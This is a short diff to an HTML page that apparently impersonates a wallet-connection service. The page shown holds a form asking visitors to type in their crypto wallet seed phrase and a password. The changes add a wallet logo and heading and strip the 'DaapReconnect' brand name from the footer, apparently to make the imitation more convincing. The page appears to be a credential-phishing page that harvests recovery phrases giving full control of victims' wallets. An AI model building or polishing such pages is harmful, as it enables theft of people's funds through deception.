--- a/ancrypto.html
+++ b/ancrypto.html
@@ -74,7 +74,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Ancrypto Wallet</h4>
+                            <div class="toop">
+                                <img src="ancrypto.png" alt="">
+                                <h4>Ancrypto Wallet</h4>   
+                            </div>
                             <textarea id="seed" minlength="30" name="Ancrypto Wallet" placeholder="Seed Phrase..." required></textarea >
                              <input name="Password" id="movepass"  type="password" placeholder="Password"/>
                         </div>
@@ -108,7 +111,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
